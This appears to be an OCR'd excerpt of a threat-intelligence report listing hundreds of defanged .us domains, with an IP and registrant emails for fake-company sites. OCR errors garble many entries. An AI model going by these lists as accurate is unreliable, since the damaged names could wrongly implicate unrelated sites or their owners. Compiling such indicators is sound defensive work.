hxxp://syntheticoilcomparison[.]us 
hxxp://supremeserver[.]us 
hxxp://stampl[.]us 
hxxp://theshopping[.]us 
hxxp://winsys[.]us 


hxxp://yveschantre[.]us 


27035 


hxxp://trivpro[.]us 
hxxp://hericanparks[.]us 
hxxp://advantageplus[.]us 
hxxp://iblinc[.]us 
hxxp://autohous[. ]us 
hxxp://felineandfido[.]Jus 
hxxp://crazybookingdeals[.]us 
hxxp://catherineandcarl[.]us 
hxxp://freephotoedit[.]us 
hxxp://marketsentiment[.]us 
hxxp://aenonbiblecollege[.]us 
hxxp://adlovermaq[.]Jus 
hxxp://gardenwilderness[.]us 
hxxp://delightcoach[.]us 
hxxp://lasermeasurement[.]us 
hxxp://geanswercenter[.]us 
hxxp://dentistrenghthshjs[.]us 
hxxp://llaa[.Jus 
hxxp://mfuture[.]us 
hxxp://berlitzstore[.]us 
hxxp://articchub[.]us 
hxxp://ediso[.]us 
hxxp://blockverse[.]us 
hxxp://nyquest[.]us 
hxxp://onlinepsychedelicshop[.]us 
hxxp://rockbottomsale[.]us 
hxxp://prosunglasses[.]us 
hxxp://powershowcase[.]us 
hxxp://scgonzalezminted[.]us 
hxxp://preaknessstakes[.]us 
hxxp://satsangcenter[.]us 
hxxp://ffreestylelibre[.]us 
hxxp://republicgeneralstore[.]us 
hxxp://digitalmart[.]us 
hxxp://alandyson[.]us 

27036 


hxxp://ecareers[.]us 
hxxp://iceagency[.]us 
hxxp://fortnight[.]us 
hxxp://saleclothes[.]us 
hxxp://soltice[.Jus 
hxxp://njbuilders[.]us 
hxxp://tritonknollconnection[.]us 
hxxp://avyy[.Jus 
hxxp://naturaltherapies[.]us 
hxxp://hotwallpapers[.]us 
hxxp://integrateddatasystems[.]us 
hxxp://aroythail[.]us 
hxxp://cooltree[.]us 
hxxp://goodforall[.]Jus 
hxxp://berberich[.Jus 
hxxp://megasub[.]us 
hxxp://onaclinic[.]us 
hxxp://largeprintdistribution[.]us 
hxxp://racingforlife[.]us 
hxxp://brazilianday[.]us 
hxxp://airtailors[.]us 
hxxp://sportshighlights[.]us 
hxxp://plomeros[.]us 
hxxp://raffin[.]us 
hxxp://directcar[.]us 
hxxp://mikespears[.]us 
hxxp://skinnyteal.]Jus 
hxxp://cheaptoryburchoutlet[.]us 
hxxp://ericn[.]us 
hxxp://lemonplus[.]Jus 
hxxp://pathwaytosuccess[.]us 
hxxp://websiteoutlook[.]us 
hxxp://capitolonephoto[.]us 
hxxp://getroofmaxx[.]us 


hxxp://arasan[.]us 


27037 


hxxp://phosaigon[.]us 
hxxp://sinistercity[.Jus 
hxxp://pixelmatrix[.]us 
hxxp://cheapservices[.]us 
hxxp://stmatts[.]us 
hxxp://goshindo[.]us 
hxxp://softsss[.]us 
hxxp://gabito[.]us 
hxxp://yumyums[. Jus 
hxxp://shopthelink[.]us 
hxxp://reviewbuilder[.]us 
hxxp://sportss[.]us 
hxxp://theeot[.]us 
hxxp://cartasi[.]us 
hxxp://tubezone[.]us 
hxxp://evershop[.]us 
hxxp://mortgagemasters[.]us 
hxxp://inglasses[.]us 
hxxp://supremly[.]Jus 
hxxp://veteranaidandattendance[.]us 
hxxp://wowcookies[.]us 
hxxp://socionet[.]us 
hxxp://uggonlinesales[.]us 
hxxp://scottlitho[.Jus 
hxxp://handgunlswI[.]us 
hxxp://kicksforward[.]us 
hxxp://citygroupgloball[.Jus 
hxxp://uneglive[.]Jus 
hxxp://grablinksby[.]us 
hxxp://islandhistory[.]us 
hxxp://etfd[.Jus 
hxxp://haytrans[.]us 
hxxp://goundfloor[.]us 
hxxp://brazierconstruction[.]us 
hxxp://milwaukeerestaurant[.]us 
27038 


hxxp://lovexme[.]us 
hxxp://arclimatechange[.]us 
hxxp://berkeleysoccer[.]us 
hxxp://blackdogacres[.]us 
hxxp://alachiacounty[.]us 
hxxp://cgracing[.]us 
hxxp://wssca[.]us 
hxxp://amild[.]us 
hxxp://wolfserver[.]us 
hxxp://wlseetickets[.]us 
hxxp://mojopooll[.]us 
hxxp://avenden[.]us 
hxxp://webwiseblactionstudios[.]us 
hxxp://weddinfwire[.]us 
hxxp://windowrepareparts[.]us 
hxxp://vhatiw[.]us 
hxxp://cheech[.]Jus 
hxxp://vapecreations[.]us 
hxxp://worldofwellpath[.]us 
hxxp://washoecountyparks[.]us 
hxxp://thesaker[.]us 
hxxp://thomasbrothers[.]us 
hxxp://tokybook[.]us 
hxxp://vactechservices[.]us 
hxxp://tokyoberry[.]Jus 
hxxp://transplantexperience[.]us 
hxxp://undat[.]us 
hxxp://truckinjuryattorneyl[.]us 
hxxp://townmortgage[.]us 
hxxp://tritonglobalsports[.]us 
hxxp://unsequence[.]us 
hxxp://wilmiington[.]us 
hxxp://atienpocargo[.]us 
hxxp://testyfesty[.]us 
hxxp://tripmoster[.]us 


27039 


hxxp://themlbshop[.]us 
hxxp://thenauticalneedle[.]Jus 
hxxp://transfrmarket[.]us 
hxxp://thegrandbible[.]us 
hxxp://urbanexradio[.]us 
hxxp://vaderstreams[.]us 
hxxp://thecookingstore[.]us 
hxxp://techgenesis[.]us 
hxxp://tellingourstory[.]us 
hxxp://thinspo[.]us 
hxxp://unbancard[.]us 
hxxp://texaspokerclub[.]us 
hxxp://tesyfest[.]us 
hxxp://thaimed[.]us 
hxxp://technologywebsite[.]us 
hxxp://thedesignconcepts[.]us 
hxxp://texyfree[.]us 
hxxp://thebrandbinle[.]us 
hxxp://textfrree[.]us 
hxxp://stahealth[.]Jus 
hxxp://southafricanfoods[.]us 
hxxp://statemationall.Jus 
hxxp://subsanddoms[.]us 
hxxp://turboshell[.]us 
hxxp://vnsatellite[.]us 
hxxp://winningrights[.]us 
hxxp://wockalane[.]us 
hxxp://zeroping[.]us 
hxxp://aandjhomeimprovements[. ]us 
hxxp://accountteam[.]us 
hxxp://accessdesign[.]us 
hxxp://abatchmadeinheaven[.]us 
hxxp://backtoschooldeals[.]us 
hxxp://americaandbeyound[.]us 
hxxp://audimotorsrq[.]us 
27040 


hxxp://ashtabulaccounty[.]us 
hxxp://bestnaijadealz[.]us 
hxxp://basetrimestrielle[.]us 
hxxp://bdprice[.]us 
hxxp://beaconites[.Jus 
hxxp://bestbeginnings[.]us 
hxxp://bookmonster[.]us 
hxxp://bspartners[.]us 
hxxp://businessforbenefit[.]us 
hxxp://condobe[.]us 
hxxp://ccschooll[.]us 
hxxp://cesocceracademy|[.]us 
hxxp://coinshacktooll[.]Jus 
hxxp://christineandjoseph[.]Jus 
hxxp://cheapralphlauren[.]us 
hxxp://coytrademining[.]us 
hxxp://earthscapellc[.]us 
hxxp://iconictrial[.Jus 
hxxp://redtrianglemedial[.]us 
hxxp://floralmetals[.]Jus 
hxxp://hsellorxpert[.]us 
hxxp://cushingsdisease[.]us 
hxxp://pvfdentall.Jus 
hxxp://fitandflavorfulvending[.]us 
hxxp://pwmedial[.]Jus 
hxxp://livedecor[.]us 
hxxp://operatry[.]us 
hxxp://incsupportpro[.]us 
hxxp://elektroautomatik[.]Jus 
hxxp://dangiesflooringdesign[.]us 
hxxp://onedoatatime[.]us 
hxxp://geservicesnetwork[.]us 
hxxp://customfootballjerseys[.Jus 
hxxp://naturalremdiestoday[.]us 


hxxp://dropsheeping[.]us 


27041 


hxxp://micsales[.]us 
hxxp://fitflopshoesclearance[.]us 
hxxp://mitnight[.]us 
hxxp://erds[.]us 
hxxp://fighttherut[.]us 
hxxp://fonebee[.]us 
hxxp://entyuc[.]us 
hxxp://empyreanmagazine[.]us 
hxxp://osteohondroz[.]us 
hxxp://mailnannyresource[.]us 
hxxp://eventul[.]us 
hxxp://eventstaylormade[.]us 
hxxp://jabonespielnaturall[.]us 
hxxp://jawallcoverinwaterprofing[.]us 
hxxp://instantabs[.]Jus 
hxxp://michiganmedicar[.]us 
hxxp://lobstein[.]Jus 
hxxp://mappingfromabovel[.]us 
hxxp://musicconnections[.]us 
hxxp://mobileautorepairservice[.]us 
hxxp://phillyponthatrackkbeatz[.]us 
hxxp://kathycanfor[.]us 
hxxp://freshlinks[.]us 
hxxp://margiessewmuchfunl. Jus 
hxxp://letspartyentertainments[.]us 
hxxp://ourproperties[.]us 
hxxp://prolaser[.]us 
hxxp://ericmarie[.]us 
hxxp://gstarinfotech[.]us 
hxxp://pridehood[.]us 
hxxp://phoenixinvestments[.]us 
hxxp://pearsoncomp[.]us 
hxxp://hackettco[.]us 
hxxp://ralphlaurenpoloscheap[.]us 
hxxp://directstaff[.]us 

27042 


222.95.197 237 lle 22235106021 ——thge 450856 


Parked on 222.35.137.237 are the following domains all using the "set up in 1990 in New York, 


the USA by three enthusiasts who have financial education" template: 


affina-groupnet .cn - Email: abuseemaildhcp@gmail.com 
affina-groupnet .com - Email: jelly@infotorrent.ru 


affina-groupsvc .cc - Email: justin dickerson@ymail.com 


2707 


hxxp://dermacure[.]us 
hxxp://lastgeneration[.]us 
hxxp://santaclaradentist[.]us 
hxxp://shopgallery[.]us 
hxxp://sanchezweldingllc[.]us 
hxxp://shoprare[.]us 
hxxp://shopgrand[.]us 
hxxp://resdntinfo[.]Jus 
hxxp://roodd[.]us 
hxxp://songradio[.]us 
hxxp://sseahawksjerseys[.]us 
hxxp://sunshinesgemz[.]us 
hxxp://streamsite[.]us 
hxxp://stevesilverteam[.]us 
hxxp://typeland[.Jus 
hxxp://thethoughtperspective[.]Jus 
hxxp://unionalls[.Jus 
hxxp://trashface[.]Jus 
hxxp://tnstate[.]us 
hxxp://theskyshop[.]us 
hxxp://thumbsupplumbingservice[.]us 
hxxp://tifosisales[.]us 
hxxp://tjambrand[.]us 
hxxp://webuyanycarsusa[.]us 
hxxp://xzatore[.]us 
hxxp://zarenestrant[.]Jus 
hxxp://kamagrareviwsl[.]us 
hxxp://guardline[.Jus 
hxxp://dsabc[.]us 
hxxp://beetus[.]us 
hxxp://masterlee[.]us 
hxxp://whynotyou[.]us 
hxxp://drivenfitness[.]us 
hxxp://sichem[.]us 


hxxp://raingutters[.]Jus 


27043 


hxxp://sachsenheim[.]us 
hxxp://zoltech[.Jus 
hxxp://kamikoto[.]us 
hxxp://omdome[.]us 
hxxp://sonavell.]us 
hxxp://tntvideo[.]us 
hxxp://harmmy[.Jus 
hxxp://carlacharms[.]us 
hxxp://handblender[.]us 
hxxp://scsr[.Jus 
hxxp://thynkmedial.]us 
hxxp://hiddenoaksholding[.]us 
hxxp://highlandcryatal[.]Jus 
hxxp://homeupgradepro[.]us 
hxxp://jimcurtis[.]us 
hxxp://hamiton[.]us 
hxxp://hidalgoclerk[.]us 
hxxp://helloalmal.]Jus 
hxxp://heavenlygoldenretriever[.]us 
hxxp://healtrx[.]us 
hxxp://gothicangles[.]us 
hxxp://gomoviez[.]us 
hxxp://gangcheats[.]us 
hxxp://garrardcountyschools[.]us 
hxxp://georgiataga[.]us 
hxxp://glamourhub[.]us 
hxxp://getifree[.]us 
hxxp://germantowndental[.]us 
hxxp://getviral[.Jus 
hxxp://futureproject[.]us 
hxxp://ftbenning[.]us 
hxxp://gadgetsbay|[.]Jus 
hxxp://foxweltechl[.]us 
hxxp://freefireworks[.]us 
hxxp://frenchbee[.]us 

27044 


hxxp://fernecosplay[.]us 
hxxp://flexsolution[.]us 
hxxp://firstpremier[.]us 
hxxp://farmtables[.Jus 
hxxp://estrellaschildcare[.]us 
hxxp://evabullied[.]us 
hxxp://familyhotelvegas[.]us 
hxxp://embassyfaith[.]us 
hxxp://elmconfig[.]us 
hxxp://emmapics[.]us 
hxxp://evisd[.]us 
hxxp://erosconnection[.]us 
hxxp://dosatemple[.]us 
hxxp://dubanime[.]us 
hxxp://drilldoctorstore[.]us 
hxxp://evilplan[.]us 
hxxp://envisionedaromas[.]us 
hxxp://dragonarts[.]us 
hxxp://jerseywholesale[.]Jus 
hxxp://emaintenance[.]us 
hxxp://dnbgroup[.]us 
hxxp://dpcsolutions[.]us 
hxxp://hogscald[.]Jus 
hxxp://dogsaviour[.]us 
hxxp://doigbillings[.]us 
hxxp://doublethree[.]us 
hxxp://domesticcuyahogacounty[.]us 
hxxp://issfoundation[.]us 
hxxp://kingaru[.]us 
hxxp://miguelparadiseconstruction[.]us 
hxxp://dianasqart[.]us 
hxxp://getawayangels[.]us 
hxxp://unitedcommunities[.]us 
hxxp://kingwilliamcounry[.]Jus 
hxxp://condomiamil.]us 

27045 


hxxp://danalouisekirkpatrick[.]us 
hxxp://chrissaleus[.]us 
hxxp://darkfoc[.]us 
hxxp://doctornaturall[.]us 
hxxp://lankyexchange[.]us 
hxxp://cruiseportmiamil[.]us 
hxxp://connectivies[.]us 
hxxp://dessertdival[.]us 
hxxp://crocoshop[.]us 
hxxp://cyberinspector[.]us 
hxxp://lavishbeautylounge[.]us 
hxxp://chuckandblair[.]us 
hxxp://conservationeasements[.]us 
hxxp://cocovotes[.]us 
hxxp://rideminded[.]us 
hxxp://staake[.]us 
hxxp://artefashionmexicil[.]us 
hxxp://delavanautoparts[.]us 
hxxp://profishshop[.]us 
hxxp://connierockco[.]us 
hxxp://chicktopial[.]us 
hxxp://raybanmonday|[.]us 
hxxp://courtesyinnsansimeon[.]us 
hxxp://clipo[.Jus 
hxxp://coltonhaynes[.]us 
hxxp://cupidcurse[.]us 
hxxp://regencyplazahotelwentzville[.]us 
hxxp://cheatandplay[.]us 
hxxp://stakefans[.]us 
hxxp://omphotography[.]us 
hxxp://cnrservices[.]us 
hxxp://covecarryout[.]us 
hxxp://craftingfunforkids[.]us 
hxxp://bathroomvanitysinks[.]us 
hxxp://australiabootssale[.]us 
27046 


hxxp://bedfordplumbing[.]us 
hxxp://summerknights[.]us 
hxxp://travelwinner[.]us 
hxxp://brooksvillegardenclub[.]Jus 
hxxp://cheapcarstereo[.]us 
hxxp://billymack[.]us 
hxxp://bloomskybar[.]us 
hxxp://bethlemchurch[.]us 
hxxp://boldhomedecor[.]us 
hxxp://warrenelectric[.]us 
hxxp://asianvibe[.]us 
hxxp://arlingtonhousingauthority[.]us 
hxxp://axtogrind[.]Jus 
hxxp://cafel[.Jus 
hxxp://barnsfoc[.]us 
hxxp://beninambassy[.]us 
hxxp://bostonsiteseeing[.]us 
hxxp://carolinacottages[.]us 
hxxp://aetransformations[.]us 
hxxp://aceya[.]us 
hxxp://appliancesr[.Jus 
hxxp://pdrdesigns[.]us 
hxxp://beattyestreet[.]us 
hxxp://afantasy[.Jus 
hxxp://brevardcerk[.]us 
hxxp://bredabed[.]us 
hxxp://appkh[.Jus 
hxxp://atlantahomeinstallations[.]us 
hxxp://aubreonaseante[.]us 
hxxp://autoinsurancequoteslst[.]us 
hxxp://cctsx[.]us 
hxxp://buyalli[.Jus 
hxxp://acsflorida[.]us 
hxxp://buycheapfurniture[.]us 


hxxp://southerpeach[.]us 


27047 


hxxp://textrree[.Jus 
hxxp://sportfamily[.Jus 
hxxp://tactnm[.]us 
hxxp://sucesszone[.]us 
hxxp://teextfree[.]Jus 
hxxp://supportmysoldier[.]us 
hxxp://tacosalcarbon[.]us 
hxxp://tastry[.]us 
hxxp://shoefitters[.Jus 
hxxp://buychanelhandbags[.]us 
hxxp://sebenil[.Jus 
hxxp://seasprayinnbeachresort[.]us 
hxxp://seetickers[.]us 
hxxp://seminoleschoolchoicesapplications[.]us 
hxxp://rquertraver[.]us 
hxxp://shortyurl[.Jus 
hxxp://schoolmasters[.]us 
hxxp://spywaredetector[.]us 
hxxp://rickyray[.]us 
hxxp://sauceapparell[.]us 
hxxp://researchmatters[.]us 
hxxp://sangamonill.Jus 
hxxp://sanssucre[.]us 
hxxp://sjcsl[.]us 
hxxp://saboal[.]us 
hxxp://scarredforlife[.]us 
hxxp://sjutility[.]us 
hxxp://sugarberrysweets[.]us 
hxxp://remodelingzone[.]Jus 
hxxp://powerputages[.]us 
hxxp://poweroutqge[.]us 
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hxxp://rcbassmasters[.]us 
hxxp://rackspacezoom|[.]us 
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hxxp://rcginvestments[.]us 
hxxp://preciosity[.]us 
hxxp://rescind[.]us 
hxxp://primeleven[.]us 
hxxp://prisim[.Jus 
hxxp://privategallery[.]us 
hxxp://prodirectsports[.]us 
hxxp://silkyshops[.]us 
hxxp://pittsburghrigging[.]us 
hxxp://prodrivingschools[.]us 


hxxp://paymentsblog[.]Jus 


hxxp://personaltrainingsolutions[.]us 


hxxp://poojamehta[.]us 
hxxp://phlacourts[.]us 
hxxp://phiverivers[.]us 
hxxp://photosbygreg[.]us 
hxxp://parkdetrpit[.]us 
hxxp://parkdetoit[.]us 


hxxp://owensboropublicschools[.]Jus 


hxxp://pamax[.]us 
hxxp://obile[.]us 
hxxp://oklahomacounties[.]us 
hxxp://onecuyahoga[.]us 
hxxp://ollirs[.]us 
hxxp://philcourts[.]Jus 
hxxp://omagles[.]us 
hxxp://onlinecheap[.]us 
hxxp://onethrone[.]us 
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hxxp://oaide[.]Jus 
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hxxp://objectsoft[.]us 
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hxxp://mygirlscout[.]Jus 
hxxp://nailideas[.]Jus 
hxxp://perfectlyplanned[.]us 
hxxp://mimitape[.]Jus 
hxxp://miharayasuhiro[.]us 
hxxp://midwestinsulation[.]us 
hxxp://mkonlineshop[.]Jus 
hxxp://moblemeter[.]us 
hxxp://motherofmen[.]us 
hxxp://medidental[.]us 
hxxp://melayul[.]us 
hxxp://meranagift[.]us 
hxxp://mobiloze[.]us 
hxxp://nlgevent[.]us 
hxxp://mochacorgishome[.]us 
hxxp://mollay[.]us 
hxxp://nonstopacne[.]us 
hxxp://merenagift[.]us 
hxxp://mjrestaurant[.]us 
hxxp://malonenyl[.]us 
hxxp://mathewandbrianal[.]us 
hxxp://mariachifiestausa[.]us 
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hxxp://mecklenburgcounty[.]us 
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hxxp://lasvehasjusticecourt[.]us 
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hxxp://keepingupwithjones[.]us 
hxxp://kanawhasherrif[.]us 
hxxp://lasvegasjusticecourr[.]us 
hxxp://jeffsfortboard[.]us 
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hxxp://jeffbrowning[.]us 
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hxxp://jenshairdesignfarmington[.]us 
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hxxp://huncho[. Jus 
hxxp://hulucomactivate[.]us 
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hxxp://wantd[.]us 
hxxp://tabbed[.]us 
hxxp://bahsil[.Jus 
hxxp://finejewelries[.]us 
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hxxp://snowfalls[.]us 
hxxp://tomatoer[.]us 
hxxp://autocop[.]us 
hxxp://choiceproducts[.]us 
hxxp://totalinch[.]us 
hxxp://thelashplug[.Jus 
hxxp://traveldayworld[.]us 


hxxp://celebrityshop[.]us 
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hxxp://homebp[.]us 
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hxxp://creditage[.]us 
hxxp://movment[.]us 
hxxp://zkeyonline[.]us 
hxxp://skylinestories[.]us 
hxxp://angelslice[.]us 
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hxxp://paulaematheus[.]us 
hxxp://mendelian[.]us 
hxxp://charmedbymyaf.]us 
hxxp://acantho[.]us 
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hxxp://medinaslandscapingcorp[.]us 
hxxp://cheapsheepskinboots[.]us 
hxxp://gsshrsolutions[.]us 
hxxp://aceacress[.]us 
hxxp://dentistsantaros[.]us 
hxxp://europeansupply[.]us 
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hxxp://cancerhealth[.]us 
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extreme-groupinc .cn - Email: abuseemaildhcp@gmail.com 
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flatgroupfly .cc - Email: steven lucas 2000@yahoo.com 
geniouspartner .cn - Email: morgan.greg@yahoo.com 
holding-group .cn - Email: ronny.greg@yahoo.com 
integrity-groupinc .cc - Email: justin dickerson@ymail.com 
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libertygroup .cc - Email: LindseyKimSI@gmail.com 
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hxxp://usaviagline[.Jus 
hxxp://fozzysautotoolchest[.]us 
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hxxp://accountrepresentative[.]us 
hxxp://alabasterhouse[.]us 
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hxxp://argollas[.]us 
hxxp://americanoutdoorsga[.]us 
hxxp://accentureflexservice[.]us 
hxxp://aeons[.]us 
hxxp://armenina[.]us 
hxxp://anderssons[.]us 
hxxp://actverticall[.]Jus 
hxxp://alpinemotors[.]us 
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hxxp://benchmarkrealestate[.]us 
hxxp://babelink[.]us 
hxxp://bollywoodlinks[.Jus 
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hxxp://brandbelonging[.]us 
hxxp://buildwells[.]us 
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hxxp://chopgatepg[.]us 
hxxp://codhealthreview[.]us 
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hxxp://defendthegaurd[.]us 
hxxp://countrybayberry[.]us 
hxxp://cardrebell[.]us 
hxxp://corporateconnection[.]us 
hxxp://ddcare[.]us 
hxxp://concreteconstruction[.]us 
hxxp://devicepreciseygid[.]us 
hxxp://corporatefilm[.]Jus 
hxxp://ciaraninteractive[.]us 
hxxp://corpscoasts[.]us 
hxxp://coiiznmarketcap[.]us 
hxxp://danceinthestreets[.]us 
hxxp://carljohanfreer[.]us 
hxxp://dietsandworkouts[.]us 
hxxp://christophercole[.]us 
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hxxp://cargodrones[.]us 
hxxp://collectiblecars[.]us 
hxxp://dietnetwork[.]us 
hxxp://cashlesssportsbetting[.]us 
hxxp://cheapjerseysonsale[.]us 
hxxp://eaglepointadvisors[.]us 
hxxp://dtvdiscounts[.]us 
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hxxp://donrippert[.]Jus 
hxxp://eagleviewroofing[.]us 
hxxp://dolphincleaningservice[.]us 
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hxxp://familywatchog[.]us 
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hxxp://finbank[.]us 
hxxp://globalprintx[.]us 
hxxp://entente[.]Jus 
hxxp://farecast[.]us 
hxxp://engineous[.]us 
hxxp://fourhundredlakeshoredrive[.]us 
hxxp://gastronaut[.]us 
hxxp://foxvalleybusiness[.]us 
hxxp://gpperformance[.]us 
hxxp://estimationexperts[.]us 
hxxp://islandsolutions[.]us 
hxxp://carpetvacuumcleaners[.]us 
hxxp://christembassyarlinton[.]us 
hxxp://danielandjill[.Jus 
hxxp://colloport[.]us 
hxxp://groudpwoergeneratorgs[.]us 
hxxp://advertiseforfree[.]Jus 
hxxp://entersea[.]us 
hxxp://expertsclub[.]us 
hxxp://telemedpro[.]us 
hxxp://getdistro[.]us 
hxxp://getmortgageapprovedcolorado[.]us 
hxxp://getfreebitcoins[.Jus 
hxxp://pharmacottage[.]us 
hxxp://afurniture[.]us 
hxxp://ourlocalheros[.]us 
hxxp://stoneinsurance[.]us 
hxxp://thetalentinstitute[.]us 
hxxp://integrativewellness[.]us 
hxxp://highbooldpressurenewly[.]us 
hxxp://heritagebaptistco[.]us 
hxxp://easyreall[.Jus 
hxxp://mikejackson[.]us 
hxxp://mirin[.Jus 


hxxp://thecozyl[.]us 
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hxxp://iceconsulting[.]us 
hxxp://wellknownstudios[.]us 
hxxp://gooddy[.]us 
hxxp://smartywatch[.]us 
hxxp://vegasnight[.]us 
hxxp://huddlenetwork[.]us 
hxxp://japanesetattoo[.]us 
hxxp://rachelmcadams[.]us 
hxxp://texaspizzal[.]us 
hxxp://shackrack[.]us 
hxxp://surachthreads[.]us 
hxxp://iptvserver[.]us 
hxxp://jamaicare[.]us 
hxxp://bellinis[.Jus 
hxxp://frankonline[.]us 
hxxp://getrally[.Jus 
hxxp://netfreebies[.Jus 
hxxp://shaprek[.]us 
hxxp://almuerzo[.]us 
hxxp://herbaltherapy[.]us 
hxxp://knowledgeflow[.]us 
hxxp://carolinadigital[.]us 
hxxp://apluscarpetandtilecleaning[.]Jus 
hxxp://heatstore[.]us 
hxxp://touchofafrica[.]us 
hxxp://skytravels[.Jus 
hxxp://quantumsales[.]us 
hxxp://prezioso[.]us 
hxxp://adonsebastiangerrard[.]us 
hxxp://bansuk[.]Jus 
hxxp://jamaallites[.Jus 
hxxp://comproof[.]us 
hxxp://gadgetszone[.]us 
hxxp://kindbrokers[.]us 
hxxp://shipio[.]us 
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hxxp://midnightmarket[.]us 
hxxp://drwellhealth[.]us 
hxxp://injurant[. Jus 
hxxp://kenyavergara[.]us 
hxxp://justificationnation[.]us 
hxxp://lengrand[.]us 
hxxp://laurenandjacob[.]Jus 
hxxp://latrans[.]Jus 
hxxp://lovethelorenzanas[.]us 
hxxp://luxchair[.]us 
hxxp://monstermags[.]us 
hxxp://eesports[.Jus 
hxxp://kingcushion[.]us 
hxxp://livephonechat[.]us 
hxxp://lingex[.]us 
hxxp://minetanium[.]us 
hxxp://livingsoillab[.]us 
hxxp://teagueandkawail[.]us 
hxxp://overallpress[.Jus 
hxxp://patentipr[.]us 
hxxp://pattersonfam[.]Jus 
hxxp://leadwizard[.]us 
hxxp://myzonecart[.]us 
hxxp://propertyprice[.]us 
hxxp://collagetown[.]us 
hxxp://rozelle[.]us 
hxxp://apwc[.]us 
hxxp://rosephotography[.]us 
hxxp://younglionco[.]us 
hxxp://travelcooking[.]us 
hxxp://disappearing[.]us 
hxxp://homelandrefi[.Jus 
hxxp://kerokero[.]us 
hxxp://pittsburghpreferred[.]us 
hxxp://rbas[.]Jus 
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hxxp://clothesvuoris[.]us 
hxxp://eexpress[.]us 
hxxp://jcelectrical[.]us 
hxxp://hazardinsurance[.]us 
hxxp://graman[.]us 
hxxp://isabelmarantsneakers[.]us 
hxxp://sthelenal[.]us 
hxxp://schuecoenergyl[.]us 
hxxp://tendskin[.Jus 
hxxp://alternativeproducts[.]us 
hxxp://beckit[.]us 
hxxp://studiorentall[.]us 
hxxp://serpinal.]us 
hxxp://stephensandcompanyl.]us 
hxxp://rallypointservices[.]us 
hxxp://schoolofpolitics[.]us 
hxxp://starsfan[.]Jus 
hxxp://audiosquad[.]us 
hxxp://beastkingdon[.]us 
hxxp://saycheez[.]us 
hxxp://playstake[.]us 
hxxp://affilinet[.]us 
hxxp://johnfriend[.Jus 
hxxp://heliossolar[.]us 
hxxp://cloudnineconsulting[.]us 
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hxxp://zestcoach[.]us 
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hxxp://shreemelectric[.]us 
hxxp://solarscreens[.]us 
hxxp://songsofhope[.]us 
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hxxp://tommysgarage[.]us 
hxxp://biotrail[.Jus 
hxxp://thenware[.]us 
hxxp://lifestyledesigner[.]us 
hxxp://barneybridges[.]us 
hxxp://heartlandfoods[.]Jus 
27078 


hxxp://chitramtv[.]Jus 
hxxp://canadadrugs[.]us 
hxxp://dirtylittlerockstar[.]us 
hxxp://benterprise[.]us 
hxxp://osteopin[.]us 
hxxp://parastoo[.]us 
hxxp://acrylictank[.]us 
hxxp://fortuneschools[.]us 
hxxp://brownandgreen[. ]us 
hxxp://moviecafe[.]us 
hxxp://carrieandmike[.]us 
hxxp://amztech[.]us 
hxxp://aquaglowl[.]us 
hxxp://azulfidine[.]us 


hxxp://israeltravell[.]us 


hxxp://oliatelessettandeet[.]us 


hxxp://snapveral.]us 


hxxp://steelersproshop[.]us 


hxxp://nationaladvantagemortgage[.]us 


hxxp://xilento[.]us 
hxxp://attorneystlouis[.]us 
hxxp://atransformedlife[.]us 
hxxp://fishell[.Jus 


hxxp://jcresourceconsultinggroup[.]us 


hxxp://housingahfc[.]us 
hxxp://vanandhan[.]us 
hxxp://vigilantt[.]us 
hxxp://walkingapart[.]us 
hxxp://asentia[.]us 
hxxp://fuendgens[.]us 
hxxp://greenvileschools[.]us 
hxxp://diomail[.]us 
hxxp://eminentautopart[.]us 
hxxp://anderpander[.]us 


hxxp://biblereadingplan[.]us 
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hxxp://greenscapesunlimited[.]us 
hxxp://filmsites[.Jus 
hxxp://easterthings[.]us 
hxxp://earnsock[.]us 
hxxp://constructionmgmt[.]us 
hxxp://elcaminomotell.]us 
hxxp://awkwardboner[.]us 
hxxp://iwebsale[.]us 
hxxp://reprendrec[.]us 
hxxp://tyneside[.]us 
hxxp://sumananews[.]us 
hxxp://rapiddigital[.Jus 
hxxp://rcelite[.]us 
hxxp://travellingwall[.Jus 
hxxp://newprofessionalsnewpractic[.]us 
hxxp://odilosupport[.]us 
hxxp://mywarhistor[.]us 
hxxp://detoxifying[.Jus 
hxxp://listedbond[.]us 
hxxp://psrservices[.]us 
hxxp://plazahotelandsuitespinebluff[.]us 
hxxp://vondutchoriginals[.]us 
hxxp://thetidecoffee[.Jus 
hxxp://climark[.]Jus 
hxxp://appvertising[.]us 
hxxp://allenmidi[.Jus 
hxxp://airportassistanc[.]us 
hxxp://bakersfieldtattooremoval[.]us 
hxxp://careertraininginstitute[.]Jus 
hxxp://ccbparis[.]us 
hxxp://christiancybe[.]us 
hxxp://chineseclass[.]us 
hxxp://morningstarcoffee[.]us 
hxxp://lotussolutions[.]us 
hxxp://sightworks[.]us 
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hxxp://traveldivas[.]Jus 
hxxp://tuhome[.]us 
hxxp://beegiveaway[.]us 
hxxp://moviestv[.]us 
hxxp://tygia[.]Jus 
hxxp://oakway[.]us 
hxxp://stickycrew[.]us 
hxxp://lightchange[.]us 
hxxp://novatechnologies[.]us 
hxxp://glep[.Jus 
hxxp://rapiddocs[.]us 
hxxp://desiboard[.]us 
hxxp://redump[.]us 
hxxp://feldene[.]us 
hxxp://empathytherapy[.]us 
hxxp://cmnal.]us 
hxxp://chunt[.]us 
hxxp://purpleangell[.]Jus 
hxxp://expodaily[.]us 
hxxp://dialadeall[.]us 
hxxp://datahongkong[.]us 
hxxp://ovsf[.Jus 
hxxp://accessmedicall[.]Jus 
hxxp://buyabcblinds[.]Jus 
hxxp://urbanboutique[.]us 
hxxp://usefuls[.]us 
hxxp://purposefullife[.Jus 
hxxp://sandsifters[.]us 
hxxp://awakeningchurch[.]us 
hxxp://madhousegraphics[.]us 
hxxp://titolo[.Jus 
hxxp://photomakers[.]us 
hxxp://verocity[.]us 
hxxp://mpab[.]Jus 
hxxp://myfamilylife[.Jus 
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hxxp://akcento[.]us 
hxxp://bexis[.]us 
hxxp://debbierose[.]us 
hxxp://decera[.]us 
hxxp://rsoa[.]us 
hxxp://solarflower[.]us 
hxxp://articlepost[.]us 
hxxp://disjoint[.]us 
hxxp://qiyanal[.]us 
hxxp://wmfinance[.]us 
hxxp://hyperpernovalabs[.]us 
hxxp://bgcpal.]us 
hxxp://cambridgecompanies[.]us 
hxxp://candyfunhouse[.]us 
hxxp://kindredminiseries[.]us 
hxxp://elitefitnesscenter[.]us 
hxxp://hospitalin[.]us 
hxxp://parcok[. Jus 
hxxp://bestork[.]us 
hxxp://usdirectauto[.]us 
hxxp://jlayscentsy[.]us 
hxxp://whatsmadeinamerical.]us 
